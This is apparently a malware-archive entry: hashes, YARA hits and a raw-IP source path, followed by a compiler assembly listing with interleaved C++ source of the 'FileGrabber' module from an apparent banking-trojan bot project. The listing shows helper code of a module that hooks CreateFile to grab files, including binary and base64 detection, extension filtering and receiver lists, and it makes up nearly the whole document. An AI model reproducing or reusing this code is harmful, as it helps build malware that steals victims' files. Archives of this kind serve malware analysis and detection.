Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 330a493eb262f11ad9469e723573769b --

Hashes
MD5: 330a493eb262f11ad9469e723573769b
SHA1: 6523ab26e8d4ed8f27ac4a1b8705099a6d073e52
SHA256: 57961b279499954ebc4d3c8be1d7fcd879dd5245ad4528e980836065b03cfd34
SSDEEP: 1536:MKEhsynPrSZeJlFjm86mohva8hh3EUkL2C2y1j+o5KcIooTSOwBv7r7xWjS7:MKqsynPrSZerFNRL2C2y1jdhIDTSOwBD
Details
File Type: BSD
Yara Hits
CuckooSandbox/embedded_win_api | YRP/possible_includes_base64_packed_functions | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release/FileGrabber.cod
Strings
		; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01 
	TITLE	e:\Projects\progs\Petrosjan\BJWJ\Source\Common\FileGrabber.cpp
	.686P
	include listing.inc
	.model	flat
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC	?Real_CreateFileA@FileGrabber@@3P6GPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA ; FileGrabber::Real_CreateFileA
PUBLIC	?Real_CreateFileW@FileGrabber@@3P6GPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA ; FileGrabber::Real_CreateFileW
PUBLIC	?receivers@FileGrabber@@3PAXA			; FileGrabber::receivers
PUBLIC	?PID@FileGrabber@@3KA				; FileGrabber::PID
PUBLIC	?stateGrabber@FileGrabber@@3HA			; FileGrabber::stateGrabber
_BSS	SEGMENT
?Real_CreateFileA@FileGrabber@@3P6GPAXPBDKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA DD 01H DUP (?) ; FileGrabber::Real_CreateFileA
?Real_CreateFileW@FileGrabber@@3P6GPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA DD 01H DUP (?) ; FileGrabber::Real_CreateFileW
?receivers@FileGrabber@@3PAXA DD 01H DUP (?)		; FileGrabber::receivers
?PID@FileGrabber@@3KA DD 01H DUP (?)			; FileGrabber::PID
?stateGrabber@FileGrabber@@3HA DD 01H DUP (?)		; FileGrabber::stateGrabber
_BSS	ENDS
EXTRN	?m_memset@@YAXPBXEI@Z:PROC			; m_memset
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\common\filegrabber.cpp
;	COMDAT ?IsBin@FileGrabber@@YA_NPAEH@Z
_TEXT	SEGMENT
_s$ = -1024						; size = 1024
_data$ = 8						; size = 4
_szData$ = 12						; size = 4
?IsBin@FileGrabber@@YA_NPAEH@Z PROC			; FileGrabber::IsBin, COMDAT
; 30   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 00 04 00
	00		 sub	 esp, 1024		; 00000400H
  00009	53		 push	 ebx
  0000a	56		 push	 esi
  0000b	57		 push	 edi
; 31   : 	//
; 32   : 	int s[256];
; 33   : 	m_memset(s, 0, sizeof(s));
  0000c	68 00 04 00 00	 push	 1024			; 00000400H
  00011	33 ff		 xor	 edi, edi
  00013	8d 85 00 fc ff
	ff		 lea	 eax, DWORD PTR _s$[ebp]
  00019	57		 push	 edi
  0001a	50		 push	 eax
  0001b	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
  00020	83 c4 0c	 add	 esp, 12			; 0000000cH
; 34   : 
; 35   : 	for( int i = 0; i < szData; i++ ) s[data[i]]++;
  00023	33 c9		 xor	 ecx, ecx
  00025	39 7d 0c	 cmp	 DWORD PTR _szData$[ebp], edi
  00028	7e 16		 jle	 SHORT $LN9@IsBin
$LL11@IsBin:
  0002a	8b 45 08	 mov	 eax, DWORD PTR _data$[ebp]
  0002d	0f b6 04 01	 movzx	 eax, BYTE PTR [ecx+eax]
  00031	8d 84 85 00 fc
	ff ff		 lea	 eax, DWORD PTR _s$[ebp+eax*4]
  00038	ff 00		 inc	 DWORD PTR [eax]
  0003a	41		 inc	 ecx
  0003b	3b 4d 0c	 cmp	 ecx, DWORD PTR _szData$[ebp]
  0003e	7c ea		 jl	 SHORT $LL11@IsBin
$LN9@IsBin:
; 36   : 
; 37   : 	//
; 38   : 	int avg = szData / 256;
  00040	8b 45 0c	 mov	 eax, DWORD PTR _szData$[ebp]
  00043	99		 cdq
  00044	81 e2 ff 00 00
	00		 and	 edx, 255		; 000000ffH
  0004a	03 c2		 add	 eax, edx
  0004c	8b c8		 mov	 ecx, eax
  0004e	c1 f9 08	 sar	 ecx, 8
; 39   : 	//
; 40   : 	int min = avg - avg / 2 - 1; if( min <= 0 ) min = 1;
  00051	8b c1		 mov	 eax, ecx
  00053	99		 cdq
  00054	2b c2		 sub	 eax, edx
  00056	d1 f8		 sar	 eax, 1
  00058	8b d1		 mov	 edx, ecx
  0005a	2b d0		 sub	 edx, eax
  0005c	4a		 dec	 edx
  0005d	3b d7		 cmp	 edx, edi
  0005f	7f 03		 jg	 SHORT $LN8@IsBin
  00061	33 d2		 xor	 edx, edx
  00063	42		 inc	 edx
$LN8@IsBin:
; 41   : 	int max = avg + avg / 2 + 1;
  00064	8d 74 08 01	 lea	 esi, DWORD PTR [eax+ecx+1]
; 42   : 	//
 [m1;m2]
; 43   :    	int m1 = 0, m2 = 0;
  00068	33 c0		 xor	 eax, eax
  0006a	33 db		 xor	 ebx, ebx
$LL7@IsBin:
; 45   : 		if( s[i] )
  0006c	8b 8c bd 00 fc
	ff ff		 mov	 ecx, DWORD PTR _s$[ebp+edi*4]
  00073	85 c9		 test	 ecx, ecx
  00075	74 0c		 je	 SHORT $LN6@IsBin
; 46   : 			if( min <= s[i] && s[i] <= max )
  00077	3b d1		 cmp	 edx, ecx
  00079	7f 07		 jg	 SHORT $LN3@IsBin
  0007b	3b ce		 cmp	 ecx, esi
  0007d	7f 03		 jg	 SHORT $LN3@IsBin
; 47   : 				m1++;
  0007f	40		 inc	 eax
; 48   : 			else
  00080	eb 01		 jmp	 SHORT $LN6@IsBin
$LN3@IsBin:
; 49   : 				m2++;
  00082	43		 inc	 ebx
$LN6@IsBin:
; 44   : 	for( int i = 0; i < 256; i++ )
  00083	47		 inc	 edi
  00084	81 ff 00 01 00
	00		 cmp	 edi, 256		; 00000100H
  0008a	7c e0		 jl	 SHORT $LL7@IsBin
; 50   : 	//
; 51   : 	//
; 52   : 	if( m1 * 75 / 100 > m2 )
  0008c	6b c0 4b	 imul	 eax, 75			; 0000004bH
  0008f	6a 64		 push	 100			; 00000064H
  00091	59		 pop	 ecx
  00092	99		 cdq
  00093	f7 f9		 idiv	 ecx
  00095	5f		 pop	 edi
  00096	5e		 pop	 esi
  00097	3b c3		 cmp	 eax, ebx
  00099	0f 9f c0	 setg	 al
  0009c	5b		 pop	 ebx
; 53   : 		return true;
; 54   : 	return false;
; 55   : }
  0009d	c9		 leave
  0009e	c3		 ret	 0
?IsBin@FileGrabber@@YA_NPAEH@Z ENDP			; FileGrabber::IsBin
; Function compile flags: /Ogspy
_TEXT	ENDS
;	COMDAT ?IsBase64@FileGrabber@@YA_NPAEH@Z
_TEXT	SEGMENT
_data$ = 8						; size = 4
_szData$ = 12						; size = 4
?IsBase64@FileGrabber@@YA_NPAEH@Z PROC			; FileGrabber::IsBase64, COMDAT
; 59   : {
  00000	53		 push	 ebx
  00001	56		 push	 esi
  00002	57		 push	 edi
; 60   : 	int sz = 0; //
 data, 
; 61   : 	int max = 0; //
 base64
; 62   : 	int len = 0; //
  00003	33 c0		 xor	 eax, eax
  00005	33 ff		 xor	 edi, edi
  00007	33 f6		 xor	 esi, esi
; 63   : 	int rows = 0; //
  00009	33 db		 xor	 ebx, ebx
; 64   : 	for( int i = 0; i < szData; i++ )
  0000b	33 d2		 xor	 edx, edx
  0000d	39 44 24 14	 cmp	 DWORD PTR _szData$[esp+8], eax
  00011	7e 56		 jle	 SHORT $LN12@IsBase64
$LL14@IsBase64:
; 65   : 	{
; 66   : 		char c = data[i];
  00013	8b 4c 24 10	 mov	 ecx, DWORD PTR _data$[esp+8]
  00017	8a 0c 0a	 mov	 cl, BYTE PTR [edx+ecx]
; 67   : 		if( c != 13 && c != 10 ) 
  0001a	80 f9 0d	 cmp	 cl, 13			; 0000000dH
  0001d	74 42		 je	 SHORT $LN11@IsBase64
  0001f	80 f9 0a	 cmp	 cl, 10			; 0000000aH
  00022	74 3d		 je	 SHORT $LN11@IsBase64
; 68   : 		{
; 69   : 			if( (c >= 'A' && c <= 'Z') ||
; 70   : 				(c >= 'a' && c <= 'z') ||
; 71   : 				(c >= '0' && c <= '9') ||
; 72   : 				c == '+' || c == '/' || c == '=' ) len++;
  00024	80 f9 41	 cmp	 cl, 65			; 00000041H
  00027	7c 05		 jl	 SHORT $LN8@IsBase64
  00029	80 f9 5a	 cmp	 cl, 90			; 0000005aH
  0002c	7e 2f		 jle	 SHORT $LN9@IsBase64
$LN8@IsBase64:
  0002e	80 f9 61	 cmp	 cl, 97			; 00000061H
  00031	7c 05		 jl	 SHORT $LN7@IsBase64
  00033	80 f9 7a	 cmp	 cl, 122			; 0000007aH
  00036	7e 25		 jle	 SHORT $LN9@IsBase64
$LN7@IsBase64:
  00038	80 f9 30	 cmp	 cl, 48			; 00000030H
  0003b	7c 05		 jl	 SHORT $LN6@IsBase64
  0003d	80 f9 39	 cmp	 cl, 57			; 00000039H
  00040	7e 1b		 jle	 SHORT $LN9@IsBase64
$LN6@IsBase64:
  00042	80 f9 2b	 cmp	 cl, 43			; 0000002bH
  00045	74 16		 je	 SHORT $LN9@IsBase64
  00047	80 f9 2f	 cmp	 cl, 47			; 0000002fH
  0004a	74 11		 je	 SHORT $LN9@IsBase64
  0004c	80 f9 3d	 cmp	 cl, 61			; 0000003dH
  0004f	74 0c		 je	 SHORT $LN9@IsBase64
; 73   : 			else
; 74   : 				if( len > max )
  00051	3b c6		 cmp	 eax, esi
  00053	7e 04		 jle	 SHORT $LN4@IsBase64
; 75   : 					max = len;
  00055	8b f0		 mov	 esi, eax
; 76   : 				else
  00057	eb 05		 jmp	 SHORT $LN3@IsBase64
$LN4@IsBase64:
; 77   : 					len = 0;
  00059	33 c0		 xor	 eax, eax
  0005b	eb 01		 jmp	 SHORT $LN3@IsBase64
$LN9@IsBase64:
; 68   : 		{
; 69   : 			if( (c >= 'A' && c <= 'Z') ||
; 70   : 				(c >= 'a' && c <= 'z') ||
; 71   : 				(c >= '0' && c <= '9') ||
; 72   : 				c == '+' || c == '/' || c == '=' ) len++;
  0005d	40		 inc	 eax
$LN3@IsBase64:
; 78   : 			sz++;
  0005e	47		 inc	 edi
; 79   : 		}
; 80   : 		else
  0005f	eb 01		 jmp	 SHORT $LN13@IsBase64
$LN11@IsBase64:
; 81   : 			rows++;
  00061	43		 inc	 ebx
$LN13@IsBase64:
; 64   : 	for( int i = 0; i < szData; i++ )
  00062	42		 inc	 edx
  00063	3b 54 24 14	 cmp	 edx, DWORD PTR _szData$[esp+8]
  00067	7c aa		 jl	 SHORT $LL14@IsBase64
$LN12@IsBase64:
; 82   : 
; 83   : 	}
; 84   : 	if( len * 100 / sz > 70 && rows > 0 ) //
 base64, 
  00069	6b c0 64	 imul	 eax, 100		; 00000064H
  0006c	99		 cdq
  0006d	f7 ff		 idiv	 edi
  0006f	83 f8 46	 cmp	 eax, 70			; 00000046H
  00072	7e 08		 jle	 SHORT $LN1@IsBase64
  00074	85 db		 test	 ebx, ebx
  00076	7e 04		 jle	 SHORT $LN1@IsBase64
; 85   : 		return true;
  00078	b0 01		 mov	 al, 1
  0007a	eb 02		 jmp	 SHORT $LN15@IsBase64
$LN1@IsBase64:
; 86   : 	return false;
  0007c	32 c0		 xor	 al, al
$LN15@IsBase64:
  0007e	5f		 pop	 edi
  0007f	5e		 pop	 esi
  00080	5b		 pop	 ebx
; 87   : }
  00081	c3		 ret	 0
?IsBase64@FileGrabber@@YA_NPAEH@Z ENDP			; FileGrabber::IsBase64
_TEXT	ENDS
EXTRN	?GetHash@STR@@YAKPADK_N@Z:PROC			; STR::GetHash
EXTRN	?ScanEnd@STR@@YAPADPADD@Z:PROC			; STR::ScanEnd
; Function compile flags: /Ogspy
;	COMDAT ?CalcExtHash@FileGrabber@@YAKPBD@Z
_TEXT	SEGMENT
_fileName$ = 8						; size = 4
?CalcExtHash@FileGrabber@@YAKPBD@Z PROC			; FileGrabber::CalcExtHash, COMDAT
; 91   : 	char* p = STR::ScanEnd( (char*)fileName, '.' );
  00000	6a 2e		 push	 46			; 0000002eH
  00002	ff 74 24 08	 push	 DWORD PTR _fileName$[esp]
  00006	e8 00 00 00 00	 call	 ?ScanEnd@STR@@YAPADPADD@Z ; STR::ScanEnd
  0000b	59		 pop	 ecx
  0000c	59		 pop	 ecx
; 92   : 	if( p )
  0000d	85 c0		 test	 eax, eax
  0000f	74 0f		 je	 SHORT $LN1@CalcExtHas
; 93   : 		return STR::GetHash( p + 1, 0, true );
  00011	6a 01		 push	 1
  00013	40		 inc	 eax
  00014	6a 00		 push	 0
  00016	50		 push	 eax
  00017	e8 00 00 00 00	 call	 ?GetHash@STR@@YAKPADK_N@Z ; STR::GetHash
  0001c	83 c4 0c	 add	 esp, 12			; 0000000cH
; 95   : }
  0001f	c3		 ret	 0
$LN1@CalcExtHas:
; 94   : 	return 0;
  00020	33 c0		 xor	 eax, eax
; 95   : }
  00022	c3		 ret	 0
?CalcExtHash@FileGrabber@@YAKPBD@Z ENDP			; FileGrabber::CalcExtHash
_TEXT	ENDS
EXTRN	?GetHash@WSTR@@YAKQA_WK_N@Z:PROC		; WSTR::GetHash
EXTRN	?ScanEnd@WSTR@@YAPA_WPA_W_W@Z:PROC		; WSTR::ScanEnd
; Function compile flags: /Ogspy
;	COMDAT ?CalcExtHash@FileGrabber@@YAKPB_W@Z
_TEXT	SEGMENT
_fileName$ = 8						; size = 4
?CalcExtHash@FileGrabber@@YAKPB_W@Z PROC		; FileGrabber::CalcExtHash, COMDAT
; 99   : 	wchar_t* p = WSTR::ScanEnd( (wchar_t*)fileName, '.' );
  00000	6a 2e		 push	 46			; 0000002eH
  00002	ff 74 24 08	 push	 DWORD PTR _fileName$[esp]
  00006	e8 00 00 00 00	 call	 ?ScanEnd@WSTR@@YAPA_WPA_W_W@Z ; WSTR::ScanEnd
  0000b	59		 pop	 ecx
  0000c	59		 pop	 ecx
; 100  : 	if( p )
  0000d	85 c0		 test	 eax, eax
  0000f	74 11		 je	 SHORT $LN1@CalcExtHas@2
; 101  : 		return WSTR::GetHash( p + 1, 0, true );
  00011	6a 01		 push	 1
  00013	83 c0 02	 add	 eax, 2
  00016	6a 00		 push	 0
  00018	50		 push	 eax
  00019	e8 00 00 00 00	 call	 ?GetHash@WSTR@@YAKQA_WK_N@Z ; WSTR::GetHash
  0001e	83 c4 0c	 add	 esp, 12			; 0000000cH
; 103  : }
  00021	c3		 ret	 0
$LN1@CalcExtHas@2:
; 102  : 	return 0;
  00022	33 c0		 xor	 eax, eax
; 103  : }
  00024	c3		 ret	 0
?CalcExtHash@FileGrabber@@YAKPB_W@Z ENDP		; FileGrabber::CalcExtHash
; Function compile flags: /Ogspy
_TEXT	ENDS
;	COMDAT ?IsExt@FileGrabber@@YA_NKPAK@Z
_TEXT	SEGMENT
_hash$ = 8						; size = 4
?IsExt@FileGrabber@@YA_NKPAK@Z PROC			; FileGrabber::IsExt, COMDAT
; _exts$ = ecx
; 108  : 	if( exts == 0 ) return false;
  00000	85 c9		 test	 ecx, ecx
  00002	75 0c		 jne	 SHORT $LN11@IsExt
$LN2@IsExt:
; 114  : 	}
; 115  : 	return false;
  00004	32 c0		 xor	 al, al
; 116  : }
  00006	c3		 ret	 0
$LL3@IsExt:
; 110  : 	{
; 111  : 		if( *exts == hash )
  00007	3b 44 24 04	 cmp	 eax, DWORD PTR _hash$[esp-4]
  0000b	74 0b		 je	 SHORT $LN8@IsExt
; 113  : 		exts++;
  0000d	83 c1 04	 add	 ecx, 4
$LN11@IsExt:
; 109  : 	while( *exts )
  00010	8b 01		 mov	 eax, DWORD PTR [ecx]
  00012	85 c0		 test	 eax, eax
  00014	75 f1		 jne	 SHORT $LL3@IsExt
; 110  : 	{
; 111  : 		if( *exts == hash )
  00016	eb ec		 jmp	 SHORT $LN2@IsExt
$LN8@IsExt:
; 112  : 			return true;
  00018	b0 01		 mov	 al, 1
; 116  : }
  0001a	c3		 ret	 0
?IsExt@FileGrabber@@YA_NKPAK@Z ENDP			; FileGrabber::IsExt
; Function compile flags: /Ogspy
_TEXT	ENDS
;	COMDAT ?FilterExt@FileGrabber@@YAHABUParamEvent@1@PAUReceiver@1@@Z
_TEXT	SEGMENT
?FilterExt@FileGrabber@@YAHABUParamEvent@1@PAUReceiver@1@@Z PROC ; FileGrabber::FilterExt, COMDAT
; _e$ = eax
; _rv$ = esi
; 119  : {
  00000	53		 push	 ebx
  00001	57		 push	 edi
; 120  : 	int ret = 0;
  00002	33 db		 xor	 ebx, ebx
  00004	33 ff		 xor	 edi, edi
; 121  : 	if( rv->ignoreExt || rv->neededExt )
  00006	39 5e 2c	 cmp	 DWORD PTR [esi+44], ebx
  00009	75 05		 jne	 SHORT $LN5@FilterExt
  0000b	39 5e 30	 cmp	 DWORD PTR [esi+48], ebx
  0000e	74 6c		 je	 SHORT $LN1@FilterExt
$LN5@FilterExt:
; 122  : 	{
; 123  : 		DWORD hash =  e.unicode ? CalcExtHash(e.fileNameW) : CalcExtHash(e.fileNameA);
  00010	6a 2e		 push	 46			; 0000002eH
  00012	50		 push	 eax
  00013	38 98 14 02 00
	00		 cmp	 BYTE PTR [eax+532], bl
  00019	74 19		 je	 SHORT $LN9@FilterExt
  0001b	e8 00 00 00 00	 call	 ?ScanEnd@WSTR@@YAPA_WPA_W_W@Z ; WSTR::ScanEnd
  00020	59		 pop	 ecx
  00021	59		 pop	 ecx
  00022	3b c3		 cmp	 eax, ebx
  00024	74 2a		 je	 SHORT $LN14@FilterExt
  00026	6a 01		 push	 1
  00028	83 c0 02	 add	 eax, 2
  0002b	53		 push	 ebx
  0002c	50		 push	 eax
  0002d	e8 00 00 00 00	 call	 ?GetHash@WSTR@@YAKQA_WK_N@Z ; WSTR::GetHash
  00032	eb 15		 jmp	 SHORT $LN17@FilterExt
$LN9@FilterExt:
  00034	e8 00 00 00 00	 call	 ?ScanEnd@STR@@YAPADPADD@Z ; STR::ScanEnd
  00039	59		 pop	 ecx
  0003a	59		 pop	 ecx
  0003b	3b c3		 cmp	 eax, ebx
  0003d	74 11		 je	 SHORT $LN14@FilterExt
  0003f	6a 01		 push	 1
  00041	40		 inc	 eax
  00042	53		 push	 ebx
  00043	50		 push	 eax
  00044	e8 00 00 00 00	 call	 ?GetHash@STR@@YAKPADK_N@Z ; STR::GetHash
$LN17@FilterExt:
  00049	8b d0		 mov	 edx, eax
  0004b	83 c4 0c	 add	 esp, 12			; 0000000cH
  0004e	eb 02		 jmp	 SHORT $LN15@FilterExt
$LN14@FilterExt:
  00050	33 d2		 xor	 edx, edx
$LN15@FilterExt:
; 124  : 		if( rv->ignoreExt )
  00052	8b 4e 2c	 mov	 ecx, DWORD PTR [esi+44]
  00055	3b cb		 cmp	 ecx, ebx
  00057	74 0e		 je	 SHORT $LN3@FilterExt
; 125  : 			if( IsExt( hash, rv->ignoreExt ) )
  00059	52		 push	 edx
  0005a	e8 00 00 00 00	 call	 ?IsExt@FileGrabber@@YA_NKPAK@Z ; FileGrabber::IsExt
  0005f	59		 pop	 ecx
  00060	84 c0		 test	 al, al
  00062	74 03		 je	 SHORT $LN3@FilterExt
; 126  : 				ret = 1; //
  00064	33 ff		 xor	 edi, edi
  00066	47		 inc	 edi
$LN3@FilterExt:
; 127  : 		if( rv->neededExt )
  00067	8b 4e 30	 mov	 ecx, DWORD PTR [esi+48]
  0006a	3b cb		 cmp	 ecx, ebx
  0006c	74 0e		 je	 SHORT $LN1@FilterExt
; 128  : 			if( IsExt( hash, rv->neededExt ) )
  0006e	52		 push	 edx
  0006f	e8 00 00 00 00	 call	 ?IsExt@FileGrabber@@YA_NKPAK@Z ; FileGrabber::IsExt
  00074	59		 pop	 ecx
  00075	84 c0		 test	 al, al
  00077	74 03		 je	 SHORT $LN1@FilterExt
; 129  : 				ret = 2; //
  00079	6a 02		 push	 2
  0007b	5f		 pop	 edi
$LN1@FilterExt:
; 130  : 	}
; 131  : 	return ret;
  0007c	8b c7		 mov	 eax, edi
  0007e	5f		 pop	 edi
  0007f	5b		 pop	 ebx
; 132  : }
  00080	c3		 ret	 0
?FilterExt@FileGrabber@@YAHABUParamEvent@1@PAUReceiver@1@@Z ENDP ; FileGrabber::FilterExt
; Function compile flags: /Ogspy
_TEXT	ENDS
;	COMDAT ?IsFormatBeg@FileGrabber@@YA_NABUParamEvent@1@PAUReceiver@1@@Z
_TEXT	SEGMENT
_res$ = -1						; size = 1
_e$ = 8							; size = 4
?IsFormatBeg@FileGrabber@@YA_NABUParamEvent@1@PAUReceiver@1@@Z PROC ; FileGrabber::IsFormatBeg, COMDAT
; _rv$ = ecx
; 136  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	51		 push	 ecx
; 137  : 	int n = 0;
  00004	33 d2		 xor	 edx, edx
  00006	57		 push	 edi
; 138  : 	bool res = false;
; 139  : 	while( rv->ignoreBeg[n][0] && !res && n < MaxIgnoreBeg )
  00007	83 c1 1c	 add	 ecx, 28			; 0000001cH
  0000a	33 ff		 xor	 edi, edi
  0000c	88 55 ff	 mov	 BYTE PTR _res$[ebp], dl
  0000f	38 11		 cmp	 BYTE PTR [ecx], dl
  00011	74 46		 je	 SHORT $LN7@IsFormatBe
  00013	53		 push	 ebx
$LL8@IsFormatBe:
  00014	38 55 ff	 cmp	 BYTE PTR _res$[ebp], dl
  00017	75 3f		 jne	 SHORT $LN20@IsFormatBe
  00019	83 ff 04	 cmp	 edi, 4
  0001c	7d 3a		 jge	 SHORT $LN20@IsFormatBe
; 140  : 	{
; 141  : 		for( int i = 0; i <= MaxLenIgnoreBeg; i++ )
; 142  : 		{
; 143  : 			if( i == MaxLenIgnoreBeg || (rv->ignoreBeg[n][i] == 0 && i > 0) ) //
  0001e	83 fa 04	 cmp	 edx, 4
$LN21@IsFormatBe:
  00021	74 27		 je	 SHORT $LN2@IsFormatBe
  00023	8a 1c 11	 mov	 bl, BYTE PTR [ecx+edx]
  00026	84 db		 test	 bl, bl
  00028	75 04		 jne	 SHORT $LN3@IsFormatBe
  0002a	85 d2		 test	 edx, edx
  0002c	7f 1c		 jg	 SHORT $LN2@IsFormatBe
$LN3@IsFormatBe:
; 146  : 				break;
; 147  : 			}
; 148  : 			if( rv->ignoreBeg[n][i] != e.data[i] )
  0002e	8b 45 08	 mov	 eax, DWORD PTR _e$[ebp]
  00031	8b 80 18 02 00
	00		 mov	 eax, DWORD PTR [eax+536]
  00037	0f b6 04 10	 movzx	 eax, BYTE PTR [eax+edx]
  0003b	0f be db	 movsx	 ebx, bl
  0003e	3b d8		 cmp	 ebx, eax
  00040	75 0c		 jne	 SHORT $LN18@IsFormatBe
  00042	42		 inc	 edx
  00043	83 fa 04	 cmp	 edx, 4
  00046	7e d9		 jle	 SHORT $LN21@IsFormatBe
  00048	eb 04		 jmp	 SHORT $LN18@IsFormatBe
$LN2@IsFormatBe:
; 144  : 			{
; 145  : 				res = true;
  0004a	c6 45 ff 01	 mov	 BYTE PTR _res$[ebp], 1
$LN18@IsFormatBe:
; 149  : 				break;
; 150  : 		}
; 151  : 		n++;
  0004e	83 c1 04	 add	 ecx, 4
  00051	33 d2		 xor	 edx, edx
  00053	47		 inc	 edi
  00054	38 11		 cmp	 BYTE PTR [ecx], dl
  00056	75 bc		 jne	 SHORT $LL8@IsFormatBe
$LN20@IsFormatBe:
  00058	5b		 pop	 ebx
$LN7@IsFormatBe:
; 152  : 	}
; 153  : 	return res;
  00059	8a 45 ff	 mov	 al, BYTE PTR _res$[ebp]
  0005c	5f		 pop	 edi
; 154  : }
  0005d	c9		 leave
  0005e	c3		 ret	 0
?IsFormatBeg@FileGrabber@@YA_NABUParamEvent@1@PAUReceiver@1@@Z ENDP ; FileGrabber::IsFormatBeg
_TEXT	ENDS
PUBLIC	?DelReceiver@FileGrabber@@YAXPAX@Z		; FileGrabber::DelReceiver
EXTRN	?MemFree@@YAXPAX@Z:PROC				; MemFree
; Function compile flags: /Ogspy
;	COMDAT ?DelReceiver@FileGrabber@@YAXPAX@Z
_TEXT	SEGMENT
_p$ = 8							; size = 4
?DelReceiver@FileGrabber@@YAXPAX@Z PROC			; FileGrabber::DelReceiver, COMDAT
; 372  : {
  00000	56		 push	 esi
; 373  : 	Receiver* pp = (Receiver*)p;
; 374  : 	MemFree(pp->ignoreExt);
  00001	8b 74 24 08	 mov	 esi, DWORD PTR _p$[esp]
  00005	ff 76 2c	 push	 DWORD PTR [esi+44]
  00008	e8 00 00 00 00	 call	 ?MemFree@@YAXPAX@Z	; MemFree
; 375  : 	MemFree(pp->neededExt);
  0000d	ff 76 30	 push	 DWORD PTR [esi+48]
  00010	e8 00 00 00 00	 call	 ?MemFree@@YAXPAX@Z	; MemFree
; 376  : 	MemFree(p);
  00015	56		 push	 esi
  00016	e8 00 00 00 00	 call	 ?MemFree@@YAXPAX@Z	; MemFree
  0001b	83 c4 0c	 add	 esp, 12			; 0000000cH
  0001e	5e		 pop	 esi
; 377  : }
  0001f	c3		 ret	 0
?DelReceiver@FileGrabber@@YAXPAX@Z ENDP			; FileGrabber::DelReceiver
_TEXT	ENDS
PUBLIC	?Release@FileGrabber@@YAXXZ			; FileGrabber::Release
EXTRN	?Free@List@@YAXPAX@Z:PROC			; List::Free
EXTRN	?UnhookCreateFile@@YAXXZ:PROC			; UnhookCreateFile
; Function compile flags: /Ogspy
;	COMDAT ?Release@FileGrabber@@YAXXZ
_TEXT	SEGMENT
?Release@FileGrabber@@YAXXZ PROC			; FileGrabber::Release, COMDAT
; 403  : 	UnhookCreateFile();
  00000	e8 00 00 00 00	 call	 ?UnhookCreateFile@@YAXXZ ; UnhookCreateFile
; 404  : 	List::Free(receivers);
  00005	ff 35 00 00 00
	00		 push	 DWORD PTR ?receivers@FileGrabber@@3PAXA ; FileGrabber::receivers
  0000b	e8 00 00 00 00	 call	 ?Free@List@@YAXPAX@Z	; List::Free
; 405  : 	receivers = 0;
  00010	33 c0		 xor	 eax, eax
  00012	59		 pop	 ecx
  00013	a3 00 00 00 00	 mov	 DWORD PTR ?receivers@FileGrabber@@3PAXA, eax ; FileGrabber::receivers
; 406  : 	PID = 0;
  00018	a3 00 00 00 00	 mov	 DWORD PTR ?PID@FileGrabber@@3KA, eax ; FileGrabber::PID
; 407  : 	stateGrabber = 0;
  0001d	a3 00 00 00 00	 mov	 DWORD PTR ?stateGrabber@FileGrabber@@3HA, eax ; FileGrabber::stateGrabber
; 408  : }
  00022	c3		 ret	 0
?Release@FileGrabber@@YAXXZ ENDP			; FileGrabber::Release
_TEXT	ENDS
PUBLIC	?CreateReceiver@FileGrabber@@YAPAUReceiver@1@XZ	; FileGrabber::CreateReceiver
EXTRN	?MemAlloc@@YAPAXK@Z:PROC			; MemAlloc
; Function compile flags: /Ogspy
;	COMDAT ?CreateReceiver@FileGrabber@@YAPAUReceiver@1@XZ
_TEXT	SEGMENT
?CreateReceiver@FileGrabber@@YAPAUReceiver@1@XZ PROC	; FileGrabber::CreateReceiver, COMDAT
; 412  : 	Receiver* ret = (Receiver*)MemAlloc( sizeof(Receiver) );
  00000	6a 38		 push	 56			; 00000038H
  00002	e8 00 00 00 00	 call	 ?MemAlloc@@YAPAXK@Z	; MemAlloc
  00007	59		 pop	 ecx
; 413  : 	ret->access = GENERIC_READ;
  00008	c7 40 10 00 00
	00 80		 mov	 DWORD PTR [eax+16], -2147483648 ; 80000000H
; 414  : 	ret->aw = CREATEFILEA | CREATEFILEW;
  0000f	c7 40 14 03 00
	00 00		 mov	 DWORD PTR [eax+20], 3
; 415  : 	return ret;
; 416  : }
  00016	c3		 ret	 0
?CreateReceiver@FileGrabber@@YAPAUReceiver@1@XZ ENDP	; FileGrabber::CreateReceiver
_TEXT	ENDS
PUBLIC	?AddReceiver@FileGrabber@@YA_NPAUReceiver@1@@Z	; FileGrabber::AddReceiver
EXTRN	?Add@List@@YAHPAX0@Z:PROC			; List::Add
; Function compile flags: /Ogspy
;	COMDAT ?AddReceiver@FileGrabber@@YA_NPAUReceiver@1@@Z
_TEXT	SEGMENT
_rv$ = 8						; size = 4
?AddReceiver@FileGrabber@@YA_NPAUReceiver@1@@Z PROC	; FileGrabber::AddReceiver, COMDAT
; 420  : 	if( receivers )
  00000	a1 00 00 00 00	 mov	 eax, DWORD PTR ?receivers@FileGrabber@@3PAXA ; FileGrabber::receivers
  00005	85 c0		 test	 eax, eax
  00007	74 0f		 je	 SHORT $LN1@AddReceive
; 421  : 	{
; 422  : 		List::Add( receivers, rv );
  00009	ff 74 24 04	 push	 DWORD PTR _rv$[esp-4]
  0000d	50		 push	 eax
  0000e	e8 00 00 00 00	 call	 ?Add@List@@YAHPAX0@Z	; List::Add
  00013	59		 pop	 ecx
  00014	59		 pop	 ecx
; 423  : 		return true;
  00015	b0 01		 mov	 al, 1
; 426  : }
  00017	c3		 ret	 0
$LN1@AddReceive:
; 424  : 	}
; 425  : 	return false;
  00018	32 c0		 xor	 al, al
; 426  : }
  0001a	c3		 ret	 0
?AddReceiver@FileGrabber@@YA_NPAUReceiver@1@@Z ENDP	; FileGrabber::AddReceiver
_TEXT	ENDS
PUBLIC	?AddIgnoreBeg@FileGrabber@@YA_NPAUReceiver@1@PBD@Z ; FileGrabber::AddIgnoreBeg
; Function compile flags: /Ogspy
